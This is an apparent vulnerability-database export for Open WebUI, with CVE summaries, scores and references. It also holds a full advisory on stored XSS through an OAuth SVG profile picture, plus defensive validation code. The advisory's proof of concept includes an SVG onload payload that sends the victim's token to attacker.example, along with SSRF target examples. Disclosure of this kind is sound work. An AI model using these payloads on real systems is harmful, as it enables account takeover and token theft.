scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45345
3
reference_url https://github.com/advisories/GHSA-gm54-m39w-grjp
reference_id GHSA-gm54-m39w-grjp
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-gm54-m39w-grjp
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-gm54-m39w-grjp
reference_id GHSA-gm54-m39w-grjp
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-18T15:50:37Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-gm54-m39w-grjp
fixed_packages
0
url pkg:pypi/open-webui@0.5.7
purl pkg:pypi/open-webui@0.5.7
is_vulnerable true
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.5.7
aliases CVE-2026-45345, GHSA-gm54-m39w-grjp
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-9zyk-459z-x3a4
30
url VCID-chug-ma8r-cucc
vulnerability_id VCID-chug-ma8r-cucc
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the _validate_collection_access function uses an incomplete allowlist that only enforces ownership checks for collections matching user-memory-* and file-* patterns. All other collection names pass through unchecked — including the system-level knowledge-bases meta-collection, which stores the IDs, names, and descriptions of every knowledge base on the instance. Any authenticated user can query this meta-collection directly via the retrieval query endpoints to obtain a global index of all knowledge bases across all users. This vulnerability is fixed in 0.9.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-44557
reference_id
reference_type
scores
0
value 0.0003
scoring_system epss
scoring_elements 0.09067
published_at 2026-06-12T12:55:00Z
1
value 0.0003
scoring_system epss
scoring_elements 0.09057
published_at 2026-06-14T12:55:00Z
2
value 0.0003
scoring_system epss
scoring_elements 0.09019
published_at 2026-06-11T12:55:00Z
3
value 0.0003
scoring_system epss
scoring_elements 0.09069
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-44557
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-44557
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-44557
3
reference_url https://github.com/advisories/GHSA-6c2x-gcp3-gp73
reference_id GHSA-6c2x-gcp3-gp73
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-6c2x-gcp3-gp73
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-6c2x-gcp3-gp73
reference_id GHSA-6c2x-gcp3-gp73
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-18T14:32:39Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-6c2x-gcp3-gp73
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-44557, GHSA-6c2x-gcp3-gp73
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-chug-ma8r-cucc
31
url VCID-cw4k-3s8z-uqh8
vulnerability_id VCID-cw4k-3s8z-uqh8
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, the validate_url() function in backend/open_webui/retrieval/web/utils.py only validates the initial URL submitted by the caller. The HTTP clients used downstream (sync requests, async aiohttp, langchain's WebBaseLoader) follow HTTP 3xx redirects by default and do not re-validate the redirect target against the private-IP / metadata-IP block list. Any authenticated user can therefore submit a public URL that 302-redirects to an internal address (e.g. 127.0.0.1, 169.254.169.254, RFC1918) and read the internal response body via the /api/v1/retrieval/process/web endpoint, the /api/v1/images/... endpoints, the /api/chat/completions endpoint with an image_url content part, and any other route that calls these helpers. This vulnerability is fixed in 0.9.5.
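Re-validating every redirect hop, as an added example that is not Open WebUI's code: `validate_url` and `fetch_with_revalidation` are hypothetical names, and `resolve`/`send` are injected stand-ins for DNS and the HTTP client so the constructed redirect chain below runs offline.

```python
"""Redirect-aware URL validation (added illustration, not Open WebUI's code).

The summary above describes a validate_url() that checks only the first URL
while the HTTP client silently follows 3xx redirects. The hypothetical
fetch_with_revalidation() below follows redirects itself so that every hop,
including the final target, passes the same block-list check.
"""
import ipaddress
from typing import Callable, Dict, List, Tuple
from urllib.parse import urljoin, urlparse

REDIRECT_STATUSES = {301, 302, 303, 307, 308}


def is_blocked_address(ip: str) -> bool:
    """Loopback, RFC1918, link-local (which includes 169.254.169.254),
    reserved, multicast and unspecified addresses are never fetched."""
    addr = ipaddress.ip_address(ip)
    return (
        addr.is_private        # RFC1918 and other non-global ranges
        or addr.is_loopback
        or addr.is_link_local  # cloud metadata range lives here
        or addr.is_reserved
        or addr.is_multicast
        or addr.is_unspecified
    )


def validate_url(url: str, resolve: Callable[[str], List[str]]) -> None:
    """Reject non-HTTP(S) schemes and hosts that resolve to a blocked address."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        raise ValueError(f"unsupported scheme in {url!r}")
    host = parsed.hostname
    if not host:
        raise ValueError(f"missing host in {url!r}")
    for ip in resolve(host):
        if is_blocked_address(ip):
            raise ValueError(f"{host} resolves to blocked address {ip}")


def fetch_with_revalidation(
    url: str,
    send: Callable[[str], Tuple[int, Dict[str, str], bytes]],
    resolve: Callable[[str], List[str]],
    max_redirects: int = 5,
) -> Tuple[int, bytes]:
    """Follow redirects manually so every hop goes through validate_url().

    Caveat: validating a hostname and then letting the client resolve it again
    leaves a DNS-rebinding window; a production fix should also pin the
    validated IP at connect time (or resolve once and connect by IP).
    """
    for _ in range(max_redirects + 1):
        validate_url(url, resolve)
        status, headers, body = send(url)
        location = headers.get("Location")
        if status in REDIRECT_STATUSES and location:
            url = urljoin(url, location)  # relative Location resolves against this hop
            continue
        return status, body
    raise ValueError("too many redirects")


# Constructed offline fixtures: a public host whose /page 302-redirects to the
# metadata IP. 1.2.3.4 / 5.6.7.8 are placeholder public addresses.
FAKE_DNS = {"public.example": ["1.2.3.4"]}
FAKE_RESPONSES = {
    "https://public.example/page": (302, {"Location": "http://169.254.169.254/latest/meta-data/"}, b""),
    "https://public.example/ok": (200, {}, b"<html>public content</html>"),
    "http://169.254.169.254/latest/meta-data/": (200, {}, b"SHOULD-NEVER-BE-READ"),
}


def fake_resolve(host: str) -> List[str]:
    """IP literals resolve to themselves; unknown names to a placeholder public IP."""
    try:
        ipaddress.ip_address(host)
        return [host]
    except ValueError:
        return FAKE_DNS.get(host, ["5.6.7.8"])


def fake_send(url: str) -> Tuple[int, Dict[str, str], bytes]:
    return FAKE_RESPONSES.get(url, (404, {}, b""))


def fetch_blocked(url: str) -> bool:
    """True when the chain starting at `url` is refused before an internal body is read."""
    try:
        fetch_with_revalidation(url, fake_send, fake_resolve)
        return False
    except ValueError:
        return True
```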
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45401
reference_id
reference_type
scores
0
value 0.00039
scoring_system epss
scoring_elements 0.12004
published_at 2026-06-14T12:55:00Z
1
value 0.00039
scoring_system epss
scoring_elements 0.11932
published_at 2026-06-11T12:55:00Z
2
value 0.00039
scoring_system epss
scoring_elements 0.12023
published_at 2026-06-12T12:55:00Z
3
value 0.00039
scoring_system epss
scoring_elements 0.12025
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45401
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 8.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45401
reference_id
reference_type
scores
0
value 8.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45401
3
reference_url https://github.com/advisories/GHSA-c6xv-rcvw-v685
reference_id GHSA-c6xv-rcvw-v685
reference_type
scores
0
value 8.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/advisories/GHSA-c6xv-rcvw-v685
4
reference_url https://github.com/advisories/GHSA-rh5x-h6pp-cjj6
reference_id GHSA-rh5x-h6pp-cjj6
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-rh5x-h6pp-cjj6
5
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-rh5x-h6pp-cjj6
reference_id GHSA-rh5x-h6pp-cjj6
reference_type
scores
0
value 8.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-18T12:47:48Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-rh5x-h6pp-cjj6
fixed_packages
0
url pkg:pypi/open-webui@0.9.5
purl pkg:pypi/open-webui@0.9.5
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.5
aliases CVE-2026-45401, GHSA-rh5x-h6pp-cjj6
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-cw4k-3s8z-uqh8
32
url VCID-dz6g-jgmg-wqce
vulnerability_id VCID-dz6g-jgmg-wqce
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.3, a regression of the original Excel-preview XSS (CVE-2026-44549) is present: the same root cause — XLSX.utils.sheet_to_html() output rendered via {@html excelHtml} without DOMPurify — was reintroduced sometime after v0.8.0 and is exploitable again. This vulnerability is fixed in 0.9.3.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45318
reference_id
reference_type
scores
0
value 0.00012
scoring_system epss
scoring_elements 0.01755
published_at 2026-06-13T12:55:00Z
1
value 0.00012
scoring_system epss
scoring_elements 0.01762
published_at 2026-06-14T12:55:00Z
2
value 0.00012
scoring_system epss
scoring_elements 0.01747
published_at 2026-06-11T12:55:00Z
3
value 0.00012
scoring_system epss
scoring_elements 0.01751
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45318
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/releases/tag/v0.9.3
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/releases/tag/v0.9.3
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45318
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45318
4
reference_url https://github.com/advisories/GHSA-hcwp-82g6-8wxc
reference_id GHSA-hcwp-82g6-8wxc
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-hcwp-82g6-8wxc
5
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-hcwp-82g6-8wxc
reference_id GHSA-hcwp-82g6-8wxc
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-18T12:44:55Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-hcwp-82g6-8wxc
6
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-jwf8-pv5p-vhmc
reference_id GHSA-jwf8-pv5p-vhmc
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/security/advisories/GHSA-jwf8-pv5p-vhmc
fixed_packages
0
url pkg:pypi/open-webui@0.9.3
purl pkg:pypi/open-webui@0.9.3
is_vulnerable true
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.3
aliases CVE-2026-45318, GHSA-hcwp-82g6-8wxc
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-dz6g-jgmg-wqce
33
url VCID-dzh3-rqx4-fqhv
vulnerability_id VCID-dzh3-rqx4-fqhv
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, _validate_collection_access() checks the user-memory-* and file-* collection name prefixes but does not check knowledge base collections, which use raw UUIDs as collection names. Any authenticated user who knows a private knowledge base UUID can read its content through the retrieval query endpoints, even though the knowledge API correctly denies that user access. The same gap affects the retrieval write endpoints (/process/text, /process/file, /process/files/batch, /process/web, /process/youtube), allowing an attacker to inject content into or overwrite another user's knowledge base. This vulnerability is fixed in 0.9.5.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45398
reference_id
reference_type
scores
0
value 0.00043
scoring_system epss
scoring_elements 0.13438
published_at 2026-06-11T12:55:00Z
1
value 0.00043
scoring_system epss
scoring_elements 0.13533
published_at 2026-06-14T12:55:00Z
2
value 0.00043
scoring_system epss
scoring_elements 0.13557
published_at 2026-06-12T12:55:00Z
3
value 0.00043
scoring_system epss
scoring_elements 0.1356
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45398
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45398
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45398
3
reference_url https://github.com/open-webui/open-webui/pull/22109
reference_id 22109
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-18T16:01:45Z/
url https://github.com/open-webui/open-webui/pull/22109
4
reference_url https://github.com/advisories/GHSA-4g37-7p2c-38r9
reference_id GHSA-4g37-7p2c-38r9
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-4g37-7p2c-38r9
5
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-4g37-7p2c-38r9
reference_id GHSA-4g37-7p2c-38r9
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-18T16:01:45Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-4g37-7p2c-38r9
6
reference_url https://github.com/open-webui/open-webui/releases/tag/v0.9.5
reference_id v0.9.5
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-18T16:01:45Z/
url https://github.com/open-webui/open-webui/releases/tag/v0.9.5
fixed_packages
0
url pkg:pypi/open-webui@0.9.5
purl pkg:pypi/open-webui@0.9.5
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.5
aliases CVE-2026-45398, GHSA-4g37-7p2c-38r9
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-dzh3-rqx4-fqhv
34
url VCID-ef1t-pxjm-j7cz
vulnerability_id VCID-ef1t-pxjm-j7cz
summary
Open WebUI vulnerable to stored XSS via OAuth picture claim stored as SVG data URI in profile_image_url
# Summary

When a user signs in via OAuth, Open WebUI fetches the `picture` claim URL, infers a MIME type from the URL extension via `mimetypes.guess_type`, and stores `data:<mime>;base64,...` as the user's profile image. The OAuth code path does not go through the `validate_profile_image_url` Pydantic validator that normally restricts profile images to PNG/JPEG/GIF/WebP. A `.svg` URL in the `picture` claim lands in the database as `data:image/svg+xml;base64,...`.

The profile image endpoint `GET /api/v1/users/{id}/profile/image` returns the stored data URI with the attacker-controlled MIME type as `Content-Type` and `Content-Disposition: inline`. Security headers (CSP, `X-Content-Type-Options`) are env-gated and not set by default. An authenticated user navigating directly to that URL gets the SVG as a top-level document, executing `<script>`/`onload` in the same origin and able to read `localStorage.token` → account takeover.

Same class of trust-boundary error as CVE-2025-64496 (trust of untrusted model servers) and CVE-2025-64495 (rich-text XSS). Different sink, different code path.

# Details

## 1. MIME inferred from URL extension, not Content-Type

`backend/open_webui/utils/oauth.py:1336-1345` — `_process_picture_url`:

```python
response = await client.get(picture_url, ...)
if response.status_code == 200:
    picture = response.content
    base64_encoded_picture = base64.b64encode(picture).decode("utf-8")
    guessed_mime_type = mimetypes.guess_type(picture_url)[0]
    if guessed_mime_type is None:
        guessed_mime_type = "image/jpeg"
    return f"data:{guessed_mime_type};base64,{base64_encoded_picture}"
```

No MIME allowlist. The upstream `Content-Type` is ignored. For a URL ending in `.svg`, `mimetypes.guess_type` returns `image/svg+xml`.

## 2. OAuth path bypasses the profile-image validator

`backend/open_webui/utils/validate.py:10-36` defines `validate_profile_image_url`, which only accepts `/user.png`, `/user-mono.png`, and `data:image/{png,jpeg,gif,webp};base64,...`.

This validator is wired into Pydantic form models (`SignupForm`, `UpdateProfileForm`, `UserUpdateForm`), but the OAuth flow at `oauth.py:1536-1540` (existing-user login) and `oauth.py:1556-1574` (new-user signup) writes via `Users.update_user_profile_image_url_by_id` and `Auths.insert_new_auth`, both of which call SQLAlchemy directly (`models/users.py:575-588`) without going through any Pydantic model. The SVG data URI lands in the DB unchallenged.

## 3. Endpoint serves attacker-controlled MIME with `inline` disposition

`backend/open_webui/routers/users.py:504-528` — `get_user_profile_image_by_id`:

```python
header, encoded = image.split(",", 1)
media_type = header.split(";")[0].lstrip("data:")  # "image/svg+xml"
data = base64.b64decode(encoded)
return StreamingResponse(
    iter([data]),
    media_type=media_type,
    headers={"Content-Disposition": "inline"},
)
```

No MIME whitelist. The route requires `get_verified_user` — any authenticated user reaches it.

## 4. No default CSP / nosniff

`backend/open_webui/utils/security_headers.py:16-61` populates headers only when the operator sets the corresponding env var. The default deployment returns none of these. Browsers render a top-level `image/svg+xml` response as an XML document and execute embedded script.

# PoC

**Prerequisites**: operator has OAuth signup enabled (`ENABLE_OAUTH_SIGNUP=true`) or OAuth login with picture sync (`OAUTH_UPDATE_PICTURE_ON_LOGIN=true`). The attacker has a valid identity on the configured IdP and can set their profile picture URL.

1. Attacker hosts a malicious SVG at `https://attacker.example/p.svg`:

```xml
<svg xmlns="http://www.w3.org/2000/svg"
     onload="fetch('https://attacker.example/x?c='+encodeURIComponent(localStorage.getItem('token')))" />
```

2. Attacker sets their IdP profile picture to that URL and signs in to Open WebUI via OAuth. Signup (or login with picture sync) stores `data:image/svg+xml;base64,...` in the attacker's `profile_image_url`.

3. Attacker shares a link to their own profile image with a victim in a chat DM or channel:

```
https://target.example/api/v1/users/<attacker-user-id>/profile/image
```

4. The authenticated victim clicks the link. The browser receives `Content-Type: image/svg+xml` with `Content-Disposition: inline`, renders the SVG as a top-level document, fires `onload`, and exfiltrates the victim's JWT. Attacker uses the JWT to take over the victim's account.

# Impact

- Account takeover of any authenticated user who opens the crafted URL.
- Post-takeover: access to the victim's chats, API keys stored in their settings, and — if the victim has `workspace.tools` permission — RCE via installed tools (per CVE-2025-64496 analysis).
- The same `_process_picture_url` function has no SSRF allowlist; a secondary primitive is to point the `picture` claim at an internal URL (metadata service, internal admin panel) and read the response bytes via the profile image endpoint.

# Suggested fix

1. In `_process_picture_url` (`utils/oauth.py:1336-1345`): reject any MIME outside `{image/png, image/jpeg, image/gif, image/webp}`. Use the upstream `Content-Type` response header, not the URL extension. Also add an SSRF allowlist or at minimum block RFC1918 / link-local / loopback targets.

2. In `get_user_profile_image_by_id` (`routers/users.py:504-528`): enforce a MIME whitelist before building `StreamingResponse`. This is the defense-in-depth layer that should have caught the bypass.

3. Apply `validate_profile_image_url` at the model/storage layer (`Users.update_user_profile_image_url_by_id`), not only at the Pydantic form layer. All write paths to the profile image column should go through the same validator.

4. Set `X-Content-Type-Options: nosniff` and a default CSP unless the operator explicitly disables them.
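
The four fix steps above can be exercised together in one small module. The following is an added example written for this page, not code from the Open WebUI project: the function names (`parse_data_uri`, `validate_profile_image_data_uri`, `response_headers_for_image`, `is_forbidden_fetch_address`) and the sample data URIs are constructed for illustration. It shows a storage-layer validator that parses the data URI with an anchored pattern (rather than `lstrip("data:")`), enforces the raster-only allowlist, cross-checks the declared type against the payload's magic bytes, emits `nosniff` plus a sandboxing CSP on the serving side, and rejects loopback, RFC1918 and link-local addresses for the upstream fetch. It runs with the standard library only.

```python
import base64
import binascii
import ipaddress
import re

# Allowlist from fix step 1: raster formats only; SVG is XML and can carry script.
ALLOWED_IMAGE_TYPES = {"image/png", "image/jpeg", "image/gif", "image/webp"}

# Magic bytes per allowed type, so a payload whose bytes do not match the
# declared type (e.g. SVG text labelled image/png) is rejected before storage.
_MAGIC = {
    "image/png": [b"\x89PNG\r\n\x1a\n"],
    "image/jpeg": [b"\xff\xd8\xff"],
    "image/gif": [b"GIF87a", b"GIF89a"],
}

# Anchored data: URI grammar: data:<type>[;param]*,<payload>.
_DATA_URI = re.compile(
    r"^data:(?P<type>[^;,]+)(?P<params>(?:;[^;,]+)*),(?P<payload>.*)$", re.DOTALL
)


def parse_data_uri(uri: str) -> tuple[str, bytes]:
    """Return (media_type, raw_bytes) or raise ValueError for anything malformed."""
    m = _DATA_URI.match(uri)
    if not m:
        raise ValueError("not a data: URI")
    media_type = m.group("type").strip().lower()
    if ";base64" in m.group("params").lower():
        try:
            data = base64.b64decode(m.group("payload"), validate=True)
        except binascii.Error as exc:
            raise ValueError(f"invalid base64 payload: {exc}") from exc
    else:
        data = m.group("payload").encode()  # textual form; never valid for raster images
    return media_type, data


def _matches_magic(media_type: str, data: bytes) -> bool:
    if media_type == "image/webp":
        return data[:4] == b"RIFF" and data[8:12] == b"WEBP"
    return any(data.startswith(sig) for sig in _MAGIC.get(media_type, []))


def validate_profile_image_data_uri(uri: str) -> str:
    """Storage-layer check (fix step 3): every write path, OAuth included, calls this.
    Returns the media type on success, raises ValueError otherwise."""
    media_type, data = parse_data_uri(uri)
    if media_type not in ALLOWED_IMAGE_TYPES:
        raise ValueError(f"media type not allowed: {media_type}")
    if not _matches_magic(media_type, data):
        raise ValueError("payload bytes do not match declared media type")
    return media_type


def check(uri: str) -> str:
    """Convenience wrapper: 'ok:<type>' or 'rejected:<reason>'."""
    try:
        return "ok:" + validate_profile_image_data_uri(uri)
    except ValueError as exc:
        return "rejected:" + str(exc)


def is_servable_media_type(media_type: str) -> bool:
    """Serving-side allowlist (fix step 2): defense in depth, independent of storage."""
    return media_type in ALLOWED_IMAGE_TYPES


def response_headers_for_image(media_type: str) -> dict[str, str]:
    """Headers for the image endpoint (fix steps 2 and 4). nosniff stops type
    guessing; the sandbox CSP disables script even if a non-raster type slipped through."""
    if not is_servable_media_type(media_type):
        raise ValueError(f"refusing to serve media type: {media_type}")
    return {
        "Content-Type": media_type,
        "Content-Disposition": "inline",
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


def is_forbidden_fetch_address(ip: str) -> bool:
    """SSRF guard for the *resolved* address of the IdP picture URL (fix step 1).
    Check the address actually connected to, not the hostname, to resist DNS rebinding."""
    addr = ipaddress.ip_address(ip)
    return (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_unspecified or addr.is_multicast or addr.is_reserved)


# Constructed sample inputs (not taken from the advisory): a minimal PNG header,
# an SVG declared honestly, and SVG bytes mislabelled as PNG.
SAMPLE_PNG_URI = "data:image/png;base64," + base64.b64encode(
    b"\x89PNG\r\n\x1a\n" + b"\x00" * 16).decode()
SAMPLE_SVG_URI = "data:image/svg+xml;base64," + base64.b64encode(
    b"<svg xmlns='http://www.w3.org/2000/svg'/>").decode()
SAMPLE_SPOOFED_URI = "data:image/png;base64," + base64.b64encode(
    b"<svg xmlns='http://www.w3.org/2000/svg'/>").decode()

if __name__ == "__main__":
    for name, uri in [("png", SAMPLE_PNG_URI), ("svg", SAMPLE_SVG_URI), ("spoofed", SAMPLE_SPOOFED_URI)]:
        print(name, check(uri))
    print(response_headers_for_image("image/png"))
    print("metadata ip blocked:", is_forbidden_fetch_address("169.254.169.254"))
```

The magic-byte check matters because a MIME allowlist alone still trusts the upstream `Content-Type`; an IdP that echoes user-supplied headers would otherwise pass an SVG through as `image/png`. The address guard is deliberately applied to the IP the client connects to rather than to the URL string, which is the only place a rebinding-resistant check can live.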

# References

- `backend/open_webui/utils/oauth.py:1318-1351` — MIME guess + fetch
- `backend/open_webui/utils/oauth.py:1536-1574` — OAuth write path
- `backend/open_webui/utils/validate.py:10-36` — validator (bypassed)
- `backend/open_webui/models/users.py:575-588` — DB write
- `backend/open_webui/routers/users.py:504-528` — serving endpoint
- `backend/open_webui/utils/security_headers.py:16-61` — env-gated headers
- CVE-2025-64496 — precedent: trust boundary error (same class)
- CVE-2025-64495 — precedent: rich-text XSS (same class)
references
0
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
1
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-3wgj-c2hg-vm6q
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/security/advisories/GHSA-3wgj-c2hg-vm6q
2
reference_url https://github.com/advisories/GHSA-3wgj-c2hg-vm6q
reference_id GHSA-3wgj-c2hg-vm6q
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
